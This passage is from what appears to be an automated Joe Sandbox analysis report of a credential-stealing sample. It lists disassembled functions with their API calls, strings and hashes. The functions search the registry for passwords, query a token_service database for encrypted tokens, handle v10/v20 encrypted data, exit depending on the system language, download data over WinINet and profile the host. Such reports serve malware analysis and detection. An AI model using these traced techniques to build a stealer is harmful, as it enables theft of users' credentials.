lstrcatA.KERNEL32(00000000,00751804), ref: 007376A0
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007376D3
lstrcatA.KERNEL32(00000000,00751808), ref: 007376ED
task.LIBCPMTD ref: 007376FB

Strings

: , xrefs: 0073764E

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 5a346d0cf6d7184c24aa54d88ee1bb2ae33b59da64284acf0ad0f36b57882717
Instruction ID: 637ca05db81282946b3971db024c605b7d7ba86613af63d1a23dccc948e077f6
Opcode Fuzzy Hash: 5a346d0cf6d7184c24aa54d88ee1bb2ae33b59da64284acf0ad0f36b57882717
Instruction Fuzzy Hash: 273170B2914109DFDB48EBE4DC9ADFF7374BB84302F144018F116A7251DA38A986DB52

Function 007372D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00737314
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00737C90), ref: 0073733A
RegEnumValueA.ADVAPI32(00737C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737452
HeapFree.KERNEL32(00000000,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737459

Part of subcall function 00739240: vsprintf_s.MSVCRT ref: 0073925B

task.LIBCPMTD ref: 00737555

Strings

Password, xrefs: 00737401

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 413e39065461dec76fa8191de2b48f45787de4800376057c2484a26ee561d51a
Instruction ID: 79868b0275d27ace5d0040a7ee3a94b14abcd6a36884db3dc826abf0bbebf4a1
Opcode Fuzzy Hash: 413e39065461dec76fa8191de2b48f45787de4800376057c2484a26ee561d51a
Instruction Fuzzy Hash: 3A6110B591426CDBDB24DB50CD45BDA77B8BF44300F0081D9E68966142DBB46FC9CF91

Function 00744780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00FCFFB8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 007447DB

Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B

lstrcatA.KERNEL32(?,00000000), ref: 00744801
lstrcatA.KERNEL32(?,?), ref: 00744820
lstrcatA.KERNEL32(?,?), ref: 00744834
lstrcatA.KERNEL32(?,00FCB9C0), ref: 00744847
lstrcatA.KERNEL32(?,?), ref: 0074485B
lstrcatA.KERNEL32(?,00FD0830), ref: 0074486F

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00740117,?,00000000,?,00000000,00750DAB,00750DAA), ref: 00748D9F

Part of subcall function 00744570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
Part of subcall function 00744570: HeapAlloc.KERNEL32(00000000), ref: 00744587
Part of subcall function 00744570: wsprintfA.USER32 ref: 007445A6
Part of subcall function 00744570: FindFirstFileA.KERNEL32(?,?), ref: 007445BD

Strings

0at, xrefs: 007448F9, 007448A1, 007448A4

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: 0at
API String ID: 167551676-4037333825
Opcode ID: eb12de01e0fe83d81c660951a26990e3f1cc3c39fd6a48c87a7a851939d0321e
Instruction ID: e704296fa89582bc2d0f2ae376fc664767e9238103045ee42e71a67cd11a1e96
Opcode Fuzzy Hash: eb12de01e0fe83d81c660951a26990e3f1cc3c39fd6a48c87a7a851939d0321e
Instruction Fuzzy Hash: 123156B291020CA7DB54F7B0DC89EED737CAB98700F404589B31996081DF78ABC98B96

Function 00748100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FD0558,00000000,?,00750E2C,00000000,?,00000000), ref: 00748130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00FD0558,00000000,?,00750E2C,00000000,?,00000000,00000000), ref: 00748137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00748158
__aulldiv.LIBCMT ref: 00748172
__aulldiv.LIBCMT ref: 00748180
wsprintfA.USER32 ref: 007481AC

Strings

@, xrefs: 0074814D
%d MB, xrefs: 007481A3

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
Instruction ID: 3509db1c7e13dfd780d87c3c59208bba0ac6c8abc4867e49412fb4d2646d1f79
Opcode Fuzzy Hash: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
Instruction Fuzzy Hash: 7A211AB1E44218ABDB10DFD4CC49FAEB7B8FB44B14F104609F605BB280D77869018BA6

Function 0073BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 00739E10: memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D

lstrlenA.KERNEL32(00000000), ref: 0073BC9F

Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0073BCCD
lstrlenA.KERNEL32(00000000), ref: 0073BDA5
lstrlenA.KERNEL32(00000000), ref: 0073BDB9

Strings

AccountTokens, xrefs: 0073BABA
AccountId, xrefs: 0073BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0073BBEB
AccountTokens, xrefs: 0073BB49

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 1440504306-1079375795
Opcode ID: f047c114306b4b10b4caf362bb257520b9a846f8dc16ec795a91066668befae4
Instruction ID: 22de9ddf7d3a2d86cb0eedfe227bfa362d8bac257b2625bb61d0492c312892d4
Opcode Fuzzy Hash: f047c114306b4b10b4caf362bb257520b9a846f8dc16ec795a91066668befae4
Instruction Fuzzy Hash: 10B14572950108FBEB05FBA0DD5AEEE737CEF54305F404568F506A6092EF386A49CB62

Function 00746770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00746A26,00750AEF), ref: 00746774
ExitProcess.KERNEL32 ref: 007467A5
ExitProcess.KERNEL32 ref: 007467AF
ExitProcess.KERNEL32 ref: 007467B9
ExitProcess.KERNEL32 ref: 007467C3
ExitProcess.KERNEL32 ref: 007467CD

Strings

u, xrefs: 00746780, 0074678C

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: u
API String ID: 1494266314-1051851173
Opcode ID: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
Instruction ID: 766011eda18ac218e44758ca9c852521d05883c34d97e248a023f7ae1c6a92d3
Opcode Fuzzy Hash: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
Instruction Fuzzy Hash: 82F05E32D18209EFD3489FE0E909B6C7B70FB45703F040199E60D86290E6784B82AB97

Function 00739E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 00740A60: memset.MSVCRT ref: 00740C1C
Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00000000), ref: 00740C35
Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00750D7C), ref: 00740C47
Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00000000), ref: 00740C5D
Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00750D80), ref: 00740C6F

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

memcmp.MSVCRT(?,v10,00000003), ref: 00739EAF
memset.MSVCRT ref: 00739EE8
LocalAlloc.KERNEL32(00000040,?), ref: 00739F41

Strings

v10, xrefs: 00739EA3
v20, xrefs: 00739E21
ERROR_RUN_EXTRACTOR, xrefs: 00739E67
@, xrefs: 00739EF1

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 1977917189-1096346117
Opcode ID: 14f3ed69013b62ab3e8c97c603280a5c21a57642e027ca3b2e2f215f2d6c7f12
Instruction ID: 62071d32c35c2be1cddfa461ad0fac633cdb3b63978426da87dd40596f07870d
Opcode Fuzzy Hash: 14f3ed69013b62ab3e8c97c603280a5c21a57642e027ca3b2e2f215f2d6c7f12
Instruction Fuzzy Hash: 54610371A50248EFEB24EFA4CD9AFDD7775AF44304F408118F90A5F192EB786A05CB91

Function 00734FB0 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00734FCA
HeapAlloc.KERNEL32(00000000), ref: 00734FD1
InternetOpenA.WININET(00750DDF,00000000,00000000,00000000,00000000), ref: 00734FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00735011
InternetReadFile.WININET(00745EDB,?,00000400,00000000), ref: 00735041
memcpy.MSVCRT(00000000,?,00000001), ref: 0073508A
InternetCloseHandle.WININET(00745EDB), ref: 007350B9
InternetCloseHandle.WININET(?), ref: 007350C6

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
String ID:
API String ID: 3894370878-0
Opcode ID: 00b997251828c56276a9898d4ff18dd1bd81677ca147f28806a50af2cbabebe3
Instruction ID: 1298cbd1971de1cd8e7185e7dbb602d233b2979e5a2c1c53a0e76c12fbadf813
Opcode Fuzzy Hash: 00b997251828c56276a9898d4ff18dd1bd81677ca147f28806a50af2cbabebe3
Instruction Fuzzy Hash: 0F3127B5A04218EBDB24CF54DC85BDCB7B8FB48704F1081D8FA09A7281C7746AC59F99

Function 007483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
wsprintfA.USER32 ref: 00748459
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
RegCloseKey.ADVAPI32(00000000), ref: 0074848C
RegCloseKey.ADVAPI32(00000000), ref: 00748499

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

RegQueryValueExA.ADVAPI32(00000000,00FD04B0,00000000,000F003F,?,00000400), ref: 007484EC
lstrlenA.KERNEL32(?), ref: 00748501
RegQueryValueExA.ADVAPI32(00000000,00FD0468,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00750B34), ref: 00748599
RegCloseKey.ADVAPI32(00000000), ref: 00748608
RegCloseKey.ADVAPI32(00000000), ref: 0074861A

Strings

%s\%s, xrefs: 0074844D

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 583362e13d09cdfc368c59a5e43f3a595cc6197c76508fb149c039408e57bb50
Instruction ID: f766363f94364dc84da2182a5c14098b638e5003671648d5861049bacdc99fa6
Opcode Fuzzy Hash: 583362e13d09cdfc368c59a5e43f3a595cc6197c76508fb149c039408e57bb50
Instruction Fuzzy Hash: 342107B2A1421CABDB64DB54DC85FE9B3B8FB88700F00C198A609A6180DF756A85CFD5

Function 00747690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007476A4
HeapAlloc.KERNEL32(00000000), ref: 007476AB
RegOpenKeyExA.ADVAPI32(80000002,00FC82D8,00000000,00020119,00000000), ref: 007476DD
RegQueryValueExA.ADVAPI32(00000000,00FD0408,00000000,00000000,?,000000FF), ref: 007476FE
RegCloseKey.ADVAPI32(00000000), ref: 00747708

Strings

Windows 11, xrefs: 007476BD

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
Instruction ID: abef00d574fe159630cb22428049077e7f95abf2d12ec4a0e8e41e96c21487dd
Opcode Fuzzy Hash: babea9b53206cfc9b97fc430fe2492f02360795fbb431c9c7aa9f829efeb43c2
Instruction Fuzzy Hash: 0F0162B6A58204FFD704DBE4DC49FADB7B8EB88701F104454FA08D7291E7749944DB92

Function 00747720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747734
HeapAlloc.KERNEL32(00000000), ref: 0074773B
RegOpenKeyExA.ADVAPI32(80000002,00FC82D8,00000000,00020119,007476B9), ref: 0074775B
RegQueryValueExA.ADVAPI32(007476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0074777A
RegCloseKey.ADVAPI32(007476B9), ref: 00747784

Strings

CurrentBuildNumber, xrefs: 00747771

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
Instruction ID: 93ea107ea263843ae071fe9fcf440cfe4606be264424dec4915fdb5d1745421b
Opcode Fuzzy Hash: 8d549b6b22d2bcdb23726423b012ea17e1b62f06b8b5d72284f72409486389ba
Instruction Fuzzy Hash: C70144F6A54308BBD700DBE0DC49FAEB7B8EB44701F004554FA09A7281DB7455409B92

Function 007492E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:t,80000000,00000003,00000000,00000003,00000080,00000000,?,00743AEE,?), ref: 007492FC
GetFileSizeEx.KERNEL32(000000FF,:t), ref: 00749319
CloseHandle.KERNEL32(000000FF), ref: 00749327

Strings

:t, xrefs: 007492F8, 007492FB
:t, xrefs: 00749311, 0074933D, 00749314

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
